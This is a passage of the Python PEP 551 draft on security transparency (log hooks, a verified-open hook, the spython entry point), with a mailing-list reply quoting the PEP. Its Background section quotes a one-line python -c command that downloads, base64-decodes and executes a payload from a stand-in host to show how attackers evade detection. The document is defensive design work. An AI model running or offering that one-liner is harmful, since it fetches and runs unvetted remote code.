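    def __init__(self, verify: Callable[[bytes], bool]) -> None:
        self._verify = verify
        self._seen: Set[str] = set()

    @staticmethod
    def _digest(data: bytes) -> str:
        return hashlib.sha256(data).hexdigest()

    def check_file_bytes(self, data: bytes) -> bool:
        # Called from the open-for-exec handler with the raw file contents.
        ok = self._verify(data)
        if ok:
            self._seen.add(self._digest(data))
        return ok

    def check_compile(self, code: Union[str, bytes]) -> bool:
        # Called from the 'compile' log hook. Assumes str source is UTF-8.
        data = code.encode("utf-8") if isinstance(code, str) else code
        if self._digest(data) in self._seen:
            return True  # Already verified when the file was opened.
        return self._verify(data)
```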

API Availability
----------------

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may
do nothing. This allows code to make calls to ``sys.loghook()`` without having
to test for existence, but it should not assume that its call will have any
effect. (Including existence tests in security-critical code allows another
vector to bypass logging, so it is preferable that the function always exist.)

``os.open_for_exec()`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython are
not required to let developers override the behavior of this function with a
hook.


Log Hook Locations
==================

Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the
following operations with the schema in Table 1. Unless otherwise specified,
the ability for log hooks to abort any listed operation should be considered
part of the rationale for including the hook.

.. csv-table:: Table 1: Log Hooks
    :header: "API Function", "Event Name", "Arguments", "Rationale"
    :widths: 2, 2, 3, 6

    ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log hooks are
    being added."
    ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks they
    are being cleaned up, mainly in case the event is triggered unexpectedly.
    This event cannot be aborted."
    ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects
    any attempt to set the ``open_for_exec`` handler."
    "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "
    ``(code, filename_or_none)``", "Detect dynamic code compilation. Note that
    this will also be called for regular imports of source code, including
    those that used ``open_for_exec``."
    ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
    sys.path_hooks)``", "Detect when modules are imported. This is raised before
    the module name is resolved to a file. All arguments other than the module
    name may be ``None`` if they are not used or available."
    "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
    ``(module_or_path,)``", "Detect when native modules are used."
    ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
    information about specific symbols retrieved from native modules."
    ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect when code
    is accessing arbitrary memory using ``ctypes``."
    ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing the id of
    objects, which in CPython reveals information about memory layout."
    ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect when
    code is accessing frames directly."
    ``sys._current_frames``, ``sys._current_frames``, "", "Detect when code is
    accessing frames directly."
    ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
    injecting profiling functions. Because of the implementation, exceptions
    raised from the hook will abort the operation, but will not be raised in
    Python code. Note that ``threading.setprofile`` eventually calls this
    function, so the event will be logged for each thread."
    ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
    trace functions. Because of the implementation, exceptions raised from the
    hook will abort the operation, but will not be raised in Python code. Note
    that ``threading.settrace`` eventually calls this function, so the event
    will be logged for each thread."
    ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", "Detect
    changes to the coroutine wrapper."
    ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "``(new_limit,)``", "
    Detect changes to the recursion limit."
    ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "
    ``(interval_us,)``", "Detect changes to the switching interval."
    "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
    ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, "
    ``(address,)``", "Detect access to network resources. The address is
    unmodified from the original call."
    ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
    creation of sockets. The arguments will be int values."
    ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
    retrieve the current host name."
    ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
    attempts to change the current host name. The name argument is passed as a
    bytes object."
    "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
    ``socket.gethostbyname``", "``(name,)``", "Detect host name resolution. The
    name argument is a str or bytes object."
    ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "``(address,)``", "
    Detect host resolution. The address argument is a str or bytes object."
    ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
    protocol)``", "Detect service resolution. The arguments are str objects."
    ``socket.getservbyport``, ``socket.getservbyport``, "``(port,
    protocol)``", "Detect service resolution. The port argument is an int and
    protocol is a str."
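
Because each event name has a fixed argument schema, a hook can cheaply flag
events whose arguments do not match what it expects. The sketch below encodes
the argument counts for a few rows of Table 1; ``SCHEMAS`` and
``check_schema`` are hypothetical names, and a real hook would still log
malformed or unknown events rather than drop them.

```python
from typing import Dict, Tuple

# Expected argument counts for a subset of Table 1 (hypothetical helper data).
SCHEMAS: Dict[str, int] = {
    "sys.addloghook": 0,
    "compile": 2,               # (code, filename_or_none)
    "import": 5,                # (module, filename, sys.path, sys.meta_path, sys.path_hooks)
    "ctypes.dlopen": 1,         # (module_or_path,)
    "ctypes.dlsym": 2,          # (lib_object, name)
    "socket.address": 1,        # (address,)
    "socket.getservbyport": 2,  # (port, protocol)
}


def check_schema(event: str, args: Tuple) -> str:
    """Classify an event as 'ok', 'unknown' or 'malformed'."""
    expected = SCHEMAS.get(event)
    if expected is None:
        # Not in this table; still worth logging rather than dropping.
        return "unknown"
    return "ok" if len(args) == expected else "malformed"
```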

TODO - more hooks in ``_socket``, ``_ssl``, others?


SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on Windows and
``spythonX.Y`` on other platforms. This entry point is intended primarily as
an example, as we expect most users of this functionality to implement their
own entry point and hooks (see `Recommendations`_). It will also be used for
tests.

Source builds will create ``spython`` by default, but distributors may choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code
execution from in-memory data or non-script files (such as pickles, which can
be executed using ``-m pickle <path>``).

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment variables)
and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
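
The argument rules and the ``._pth`` lookup could be approximated as follows.
``parse_spython_argv`` and ``pth_path_for`` are hypothetical helpers. The
sketch assumes that on Windows the ``.exe`` suffix is replaced (so
``spython.exe`` becomes ``spython._pth``) while on other platforms ``._pth``
is appended to the full executable path, matching the two examples above, and
that any arguments after the script are passed to the script unchanged.

```python
import os
from typing import List


def parse_spython_argv(argv: List[str]) -> str:
    """Return the script path, rejecting options or a missing script."""
    # argv[0] is the executable; the script must come immediately after it.
    if len(argv) < 2:
        raise SystemExit("usage: spython SCRIPT [ARGS...]")
    script = argv[1]
    if script.startswith("-"):
        # No options at all, including -c, -m and a bare '-' for stdin.
        raise SystemExit("spython does not accept options: " + script)
    return script


def pth_path_for(executable: str, windows: bool) -> str:
    """Compute the ._pth path that sits next to the given executable."""
    full = os.path.abspath(executable)
    if windows:
        root, ext = os.path.splitext(full)
        if ext.lower() == ".exe":
            full = root
    return full + "._pth"
```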

**Log security events to a file**

Before initialization, ``spython`` will set a log hook that writes events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).

The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.
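
A Python-level approximation of this hook might look like the sketch below.
In ``spython`` the hook is installed from C before initialization; here
``default_log_path`` and ``make_file_log_hook`` are hypothetical helpers, the
tab-separated record format is an assumption, and the default path assumes
the ``.log`` suffix is appended to the full executable path.

```python
import os
import time
from typing import Callable, Mapping, Tuple


def default_log_path(executable: str, environ: Mapping[str, str]) -> str:
    # SPYTHONLOG, if set, wins over the default (discouraged in practice).
    # Assumption: ".log" is appended to the full executable path.
    return environ.get("SPYTHONLOG") or os.path.abspath(executable) + ".log"


def make_file_log_hook(path: str) -> Callable[[str, Tuple], None]:
    def hook(event: str, args: Tuple) -> None:
        # Write the record first, so refused events are still logged.
        # Opening the file per event keeps the sketch simple but is slow.
        with open(path, "a", encoding="utf-8") as log:
            log.write("{:.3f}\t{}\t{!r}\n".format(time.time(), event, args))
        if event == "sys.addloghook":
            # Abort every attempt to add another hook.
            raise RuntimeError("additional log hooks are not permitted")

    return hook
```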

On Windows, code from ``compile`` events will be submitted to AMSI [5]_ and if
it fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute hook that
validates all files opened with ``os.open_for_exec``. This implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
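
Expressed in Python, the sample open-for-execute hook might look like the
sketch below. ``make_suffix_checking_handler`` is hypothetical, and the
event-raising function is passed in as ``raise_event`` (with the same
``(event, *args)`` shape as the proposed ``sys.loghook``) because that
function does not exist in current releases. The suffix comparison here is
case-sensitive, which is an assumption.

```python
import io
from typing import BinaryIO, Callable


def make_suffix_checking_handler(
    raise_event: Callable[..., None]
) -> Callable[[str], BinaryIO]:
    def handler(path: str) -> BinaryIO:
        # Only plain source files are allowed, which also rules out .pyc.
        allowed = path.endswith(".py")
        # Log the decision as (filename, True_if_allowed) before acting.
        raise_event("spython.open_for_exec", path, allowed)
        if not allowed:
            raise PermissionError("refusing to execute " + path)
        return io.open(path, "rb")

    return handler
```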

On Windows, the hook will also open the file with flags that prevent any other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a
``compile`` event, so there is no need to read the contents now for AMSI, but
other validation mechanisms such as DeviceGuard [4]_ should be performed here.


Performance Impact
==================

**TODO**

Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly affect
any existing benchmarks, though targeted microbenchmarks can observe an
impact.

The performance impact of using ``spython`` or of adding hooks is not of
interest here, since this is considered opt-in functionality.
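
A targeted microbenchmark of the kind mentioned above can be approximated
with ``timeit``. This only times a pure-Python stand-in (the hypothetical
``loghook`` below, looping over an empty hook list), not the proposed C
implementation, so its numbers show the shape of the measurement rather than
CPython's actual cost.

```python
import timeit
from typing import Callable, Dict, List, Tuple

# Stand-in hook list, left empty to model the "no hooks added" case.
_hooks: List[Callable[[str, Tuple], None]] = []


def loghook(event: str, *args) -> None:
    # With no hooks registered this is only a loop over an empty list.
    for hook in _hooks:
        hook(event, args)


def measure(number: int = 100000) -> Dict[str, float]:
    # Time an empty callable as a baseline, then a callable that also
    # invokes the stand-in dispatcher.
    baseline = timeit.timeit(lambda: None, number=number)
    with_call = timeit.timeit(lambda: loghook("compile", "x = 1", None), number=number)
    return {"baseline_s": baseline, "no_hooks_s": with_call}


if __name__ == "__main__":
    for name, seconds in measure().items():
        print("{}: {:.4f}s".format(name, seconds))
```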


Recommendations
===============

Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that the advice ought to
be considered for high-value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network,
though different organizations may have different titles for the
relevant person.

Sysadmins **should** build their own entry point, likely starting from
``spython``, and directly interface with the security systems available
in their environment. The more tightly integrated, the less likely a
vulnerability will be found allowing an attacker to bypass those
systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.

The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.

Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4]_ to validate signatures either automatically or using an
``open_for_exec`` hook.

Sysadmins **should** collect as many logged events as possible, and
**should** copy them off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable logging. Log hooks **should not**
attempt to preemptively filter events, as even benign events are useful
when analyzing the progress of an attack. (Watch the "No Easy Breach"
video under `Further Reading`_ for a deeper look at this side of things.)

Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than
to prevent them. Very few actions should be aborted, as most will occur
during normal use. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.
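
The record-then-abort ordering can be sketched as a hook that always passes
the event to a recording function first and only then checks a short
deny-list built from an audit of the organization's own code.
``make_log_then_abort_hook``, the ``record`` callback and the example
deny-list entry are illustrative assumptions, not a recommendation to block
any particular event.

```python
from typing import Callable, FrozenSet, Tuple


def make_log_then_abort_hook(
    record: Callable[[str, Tuple], None], denied: FrozenSet[str]
) -> Callable[[str, Tuple], None]:
    def hook(event: str, args: Tuple) -> None:
        # 1. Always record, including events that are about to be refused.
        record(event, args)
        # 2. Abort only the few operations known never to be used deliberately.
        if event in denied:
            raise PermissionError("operation not permitted: " + event)

    return hook
```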

On production machines, the first log hook **should** be set in C code
before ``Py_Initialize`` is called, and that hook **should**
unconditionally abort the ``sys.addloghook`` event. The Python interface
is mainly useful for testing.

On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook; however, logging the
``setopenforexecutehandler`` event is useful since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.

[TODO: more good advice; less bad advice]

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
    By Aviv Raff for SecurityWeek, 29th January 2014

    This article, and those linked by it, are high-level summaries of the rise
    of APTs and the differences from "traditional" malware.

    `<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
    By FireEye, accessed 23rd August 2017

    A summary of the techniques used by APTs, and links to a number of relevant
    whitepapers.

    `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
    By Aviv Raff for SecurityWeek, 8th May 2014

    High-level summary of the value of detailed logging and automatic analysis.

    `<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
    Video presented by Matt Dunwoody and Nick Carr for Mandiant at ShmooCon 2016

    Detailed walkthrough of the processes and tools used in detecting and
    removing an APT.

    `<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
    Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

    Good security practices, capabilities and recommendations from the chief of
    NSA's Tailored Access Operations.

    `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
   Protection Advances in Windows 10,
   `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI,
   `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers,
   `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing,
   `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for doing
much of the initial research, analysis and implementation, Lee Holmes for
invaluable insights into the info-sec field and PowerShell's responses, and
Brett Cannon for the grounding discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
http://www.opencontent.org/openpub/).


From brett at python.org  Thu Aug 24 21:57:04 2017
From: brett at python.org (Brett Cannon)
Date: Fri, 25 Aug 2017 01:57:04 +0000
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>

One point to make about the importlib changes: since the change is currently
being made to importlib.abc.FileLoader.get_data()
<https://docs.python.org/3/library/importlib.html#importlib.abc.FileLoader.get_data>,
the default case for reading a non-.py file should be to do nothing and allow
the read to occur. Otherwise there will be issues with code that is using
that method to read data files (which is a legit use-case). Otherwise we're
going to need a new subclass of importlib.machinery.SourceFileLoader where
we document that you can't use get_data() to read arbitrary bytes, or
restructure get_code() to not use get_data(). Or we need a new API to flag
when get_data() should do a verifying open().

There is also the issue of not reading .pyc files, which will either have to
be addressed by coming up with a complementary flag to
PYTHONDONTWRITEBYTECODE or, once again, a special subclass where get_code()
ignores bytecode completely.

On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:

> Hi security-sig,
>
> Those of you who were at the PyCon US language summit this year (or who
> saw the coverage at https://lwn.net/Articles/723823/) may recall that I
> talked briefly about the ways Python is used by attackers to gain and/or
> retain access to systems on local networks.
>
> This comes out of work we've been doing at Microsoft to balance the
> flexibility of scripting languages with their usefulness to malicious
> users. PowerShell in particular has had a lot of work done, and we've
> been doing the same internally for Python. Things like transcripting
> (log every piece of code when it is compiled) and signature validation
> (prevent loading unsigned code).
>
> This PEP is about upstreaming enough functionality to make it easier to
> maintain these features - it is *not* intended to add specific security
> features to the core release. The aim is to be able to use a standard
> libpython3.7/python37.dll with a custom python3.7/python.exe that adds
> those features (listed in the PEP).
>
> Right now parts of the PEP are incomplete. In particular, the
> Recommendations section is much shorter than I intend, the list of log
> hook locations is also too short, and I have only done a preliminary
> performance analysis. But it's time to get reviews of the overall
> concept. I'd also like to take suggestions for more hook locations and
> relevant recommendations, so feel free to throw them out there. In
> particular, I'm not as up to date on best practices for non-Windows
> platforms as the rest of the list, so feel free to correct or improve
> those parts.
>
> Because ReST+max 80 character width makes tables completely unreadable
> in source, I suggest reading it at
> https://github.com/python/peps/blob/master/pep-0551.rst but I've
> included the full text below for quoting purposes.
>
> My current implementation is available at
> https://github.com/zooba/cpython/tree/sectrans and should work on both
> Windows and Linux. I hope to take this to python-dev by next week and
> spend the dev sprints getting the PEP to the point where it can be
> accepted.
>
> ==========================================================
>
> PEP: 551
> Title: Security transparency in the Python runtime
> Version: $Revision$
> Last-Modified: $Date$
> Author: Steve Dower <steve.dower at python.org>
> Status: Draft
> Type: Standards Track
> Content-Type: text/x-rst
> Created: 23-Aug-2017
> Python-Version: 3.7
> Post-History:
>
> Abstract
> ========
>
> This PEP describes additions to the Python API and specific behaviors for
> the CPython implementation that make actions taken by the Python runtime
> visible to security and auditing tools. The goals in order of increasing
> importance are to prevent malicious use of Python, to detect and report on
> malicious use, and most importantly to detect attempts to bypass detection.
> Most of the responsibility for implementation is required from users, who
> must customize and build Python for their own environment.
>
> We propose two small sets of public APIs to enable users to reliably build
> their copy of Python without having to modify the core runtime, protecting
> future maintainability. We also discuss recommendations for users to help
> them develop and configure their copy of Python.
>
> Background
> ==========
>
> Software vulnerabilities are generally seen as bugs that enable remote or
> elevated code execution. However, in our modern connected world, the more
> dangerous vulnerabilities are those that enable advanced persistent threats
> (APTs). APTs are achieved when an attacker is able to penetrate a network,
> establish their software on one or more machines, and over time extract
> data or intelligence. Some APTs may make themselves known by maliciously
> damaging data (e.g., `WannaCrypt
> <https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
> or hardware (e.g., `Stuxnet
> <https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
> Most attempt to hide their existence and avoid detection. APTs often use a
> combination of traditional vulnerabilities, social engineering, phishing
> (or spear-phishing), thorough network analysis, and an understanding of
> misconfigured environments to establish themselves and do their work.
>
> The first infected machines may not be the final target and may not require
> special privileges. For example, an APT that is established as a
> non-administrative user on a developer's machine may have the ability to
> spread to production machines through normal deployment channels. It is
> common for APTs to persist on as many machines as possible, with sheer
> weight of presence making them difficult to remove completely.
>
> Whether an attacker is seeking to cause direct harm or hide their tracks,
> the biggest barrier to detection is a lack of insight. System
> administrators with large networks rely on distributed logs to understand
> what their machines are doing, but logs are often filtered to show only
> error conditions. APTs that are attempting to avoid detection will rarely
> generate errors or abnormal events. Reviewing normal operation logs
> involves a significant amount of effort, though work is underway by a
> number of companies to enable automatic anomaly detection within
> operational logs. The tools preferred by attackers are ones that are
> already installed on the target machines, since log messages from these
> tools are often expected and ignored in normal use.
>
> At this point, we are not going to spend further time discussing the
> existence of APTs or methods and mitigations that do not apply to this PEP.
> For further information about the field, we recommend reading or watching
> the resources listed under `Further Reading`_.
>
> Python is a particularly interesting tool for attackers due to its
> prevalence on server and developer machines, its ability to execute
> arbitrary code provided as data (as opposed to native binaries), and its
> complete lack of internal logging. This allows attackers to download,
> decrypt, and execute malicious code with a single command::
>
>      python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64').read()).decode())"
>
> This command currently bypasses most anti-malware scanners that rely on
> recognizable code being read through a network connection or being written
> to disk (base64 is often sufficient to bypass these checks). It also
> bypasses protections such as file access control lists or permissions (no
> file access occurs), approved application lists (assuming Python has been
> approved for other uses), and automated auditing or logging (assuming
> Python is allowed to access the internet or access another machine on the
> local network from which to obtain its payload).
>
> General consensus among the security community is that totally preventing
> attacks is infeasible and defenders should assume that they will often
> detect attacks only after they have succeeded. This is known as the "assume
> breach" mindset. [1]_ In this scenario, protections such as sandboxing and
> input validation have already failed, and the important task is detection,
> tracking, and eventual removal of the malicious code. To this end, the
> primary feature required from Python is security transparency: the ability
> to see what operations the Python runtime is performing that may indicate
> anomalous or malicious use. Preventing such use is valuable, but secondary
> to the need to know that it is occurring.
>
> To summarise the goals in order of increasing importance:
>
> * preventing malicious use is valuable
> * detecting malicious use is important
> * detecting attempts to bypass detection is critical
>
> One example of a scripting engine that has addressed these challenges is
> PowerShell, which has recently been enhanced towards similar goals of
> transparency and prevention. [2]_
>
> Generally, application and system configuration will determine which events
> within a scripting engine are worth logging. However, given that the value
> of many logged events is not recognized until after an attack is detected,
> it is important to capture as much as possible and filter views rather than
> filtering at the source (see the No Easy Breach video under
> `Further Reading`_). Events that are always of interest include attempts to
> bypass event logging, attempts to load and execute code that is not
> correctly signed or access-controlled, use of uncommon operating system
> functionality such as debugging or inter-process inspection tools, most
> network access and DNS resolution, and attempts to create and hide files or
> configuration settings on the local machine.
>
> To summarize, defenders have a need to audit specific uses of Python in
> order to detect abnormal or malicious usage. Currently, the Python runtime
> does not provide any ability to do this, which (anecdotally) has led to
> organizations switching to other languages. The aim of this PEP is to
> enable system administrators to deploy a security transparent copy of
> Python that can integrate with their existing auditing and protection
> systems.
>
> On Windows, some specific features that may be enabled by this include:
>
> * Script Block Logging [3]_
> * DeviceGuard [4]_
> * AMSI [5]_
> * Persistent Zone Identifiers [6]_
> * Event tracing (which includes event forwarding) [7]_
>
> On Linux, some specific features that may be integrated are:
>
> * gnupg [8]_
> * sd_journal [9]_
> * OpenBSM [10]_
> * syslog [11]_
> * check execute bit on imported modules
>
>
> On macOS, some features that may be used with the expanded APIs are:
>
> * OpenBSM [10]_
> * syslog [11]_
>
> Overall, the ability to enable these platform-specific features on
> production machines is highly appealing to system administrators and will
> make Python a more trustworthy dependency for application developers.
>
>
> Overview of Changes
> ===================
>
> True security transparency is not fully achievable by Python in isolation.
> The runtime can log as many events as it likes, but unless the logs are
> reviewed and analyzed there is no value. Python may impose restrictions in
> the name of security, but usability may suffer. Different platforms and
> environments will require different implementations of certain security
> features, and organizations with the resources to fully customize their
> runtime should be encouraged to do so.
>
> The aim of these changes is to enable system administrators to integrate
> Python into their existing security systems, without dictating what those
> systems look like or how they should behave. We propose two API changes to
> enable this: an Event Log Hook and Verified Open Hook. Neither is set by
> default, and both require modifying the appropriate entry point to enable
> any functionality. For the purposes of validation and example, we propose a
> new spython/spython.exe entry point program that enables some basic
> functionality using these hooks. However, the expectation is that
> security-conscious organizations will create their own entry points to
> meet their needs.
>
> Event Log Hook
> --------------
>
> In order to achieve security transparency, an API is required to raise
> messages from within certain operations. These operations are typically
> deep within the Python runtime or standard library, such as dynamic code
> compilation, module imports, DNS resolution, or use of certain modules such
> as ``ctypes``.
>
> The new APIs required for log hooks are::
>
>     # Add a logging hook
>     sys.addloghook(hook: Callable[[str, tuple], None]) -> None
>     int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
>
>     # Raise an event with all logging hooks
>     sys.loghook(str, *args) -> None
>     int PySys_LogHook(const char *event, PyObject *args);
>
>     # Internal API used during Py_Finalize() - not publicly accessible
>     void _Py_ClearLogHooks(void);
>
> Hooks are added by calling ``PySys_AddLogHook()`` from C at any time,
> including before ``Py_Initialize()``, or by calling ``sys.addloghook()``
> from Python code. Hooks are never removed or replaced, and existing hooks
> have an opportunity to refuse to allow new hooks to be added (adding a
> logging hook is logged, and so preexisting hooks can raise an exception to
> block the new addition).
>
> When events of interest are occurring, code can either call
> ``PySys_LogHook()`` from C (while the GIL is held) or ``sys.loghook()``.
> The string argument is the name of the event, and the tuple contains
> arguments. A given event name should have a fixed schema for arguments, and
> both arguments are considered a public API (for a given x.y version of
> Python), and thus should only change between feature releases with updated
> documentation.
>
> When an event is logged, each hook is called in the order it was added with
> the event name and tuple. If any hook returns with an exception set, later
> hooks are ignored and *in general* the Python runtime should terminate.
> This is intentional to allow hook implementations to decide how to respond
> to any particular event. The typical responses will be to log the event,
> abort the operation with an exception, or to immediately terminate the
> process with an operating system exit call.
>
> When an event is logged but no hooks have been set, the ``loghook()``
> function should add minimal overhead. Ideally, each argument is a
> reference to existing data rather than a value calculated just for the
> logging call.
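
The dispatch rules above (registration order, an exception stopping later hooks, and a cheap no-hook path) might be modelled in pure Python as follows. The names `log_event`, `record`, `refuse_ctypes` and `never_reached` are hypothetical; this sketch simply propagates the exception to the caller, leaving the decision to terminate to the runtime as the text describes.

```python
from typing import Callable, List

Hook = Callable[[str, tuple], None]
_hooks: List[Hook] = []  # hypothetical stand-in for internal storage


def log_event(event: str, *args) -> None:
    # Fast path: with no hooks registered, return before doing any work.
    if not _hooks:
        return
    # Hooks run in registration order; if one raises, the exception
    # propagates and the remaining hooks are never called.
    for hook in _hooks:
        hook(event, args)


seen: List[str] = []


def record(event: str, args: tuple) -> None:
    seen.append(event)  # typical response: log the event


def refuse_ctypes(event: str, args: tuple) -> None:
    if event.startswith("ctypes."):
        raise PermissionError(event)  # typical response: abort the operation


def never_reached(event: str, args: tuple) -> None:
    seen.append("late:" + event)


_hooks.extend([record, refuse_ctypes, never_reached])

# Arguments are existing objects (a module name, Nones), not computed values.
log_event("import", "json", None, None, None, None)
try:
    log_event("ctypes.dlopen", "libc.so.6")
except PermissionError:
    pass
```

After both calls, `never_reached` has only seen the ``import`` event, because `refuse_ctypes` raised before it could run for ``ctypes.dlopen``.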
>
> As hooks may be Python objects, they need to be freed during
> ``Py_Finalize()``. To do this, we add an internal API
> ``_Py_ClearLogHooks()`` that releases any ``PyObject*`` hooks that are
> held, as well as any heap memory used. This is an internal function with
> no public export, but it passes an event to all existing hooks to ensure
> that unexpected calls are logged.
>
> See `Log Hook Locations`_ for proposed log hook points and schemas, and the
> `Recommendations`_ section for discussion on appropriate responses.
>
> Verified Open Hook
> ------------------
>
> Most operating systems have a mechanism to distinguish between files that
> can be executed and those that cannot. For example, this may be an
> execute bit in the permissions field, or a verified hash of the file
> contents to detect potential code tampering. These are an important
> security mechanism for preventing execution of data or code that is not
> approved for a given environment. Currently, Python has no way to
> integrate with these when launching scripts or importing modules.
>
> The new public API for the verified open hook is::
>
>     # Set the handler
>     int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide));
>
>     # Open a file using the handler
>     os.open_for_exec(pathlike)
>
> The ``os.open_for_exec()`` function is a drop-in replacement for
> ``open(pathlike, 'rb')``. Its default behaviour is to open a file for
> raw, binary access - any more restrictive behaviour requires the use of a
> custom handler. (Aside: since ``importlib`` requires access to this
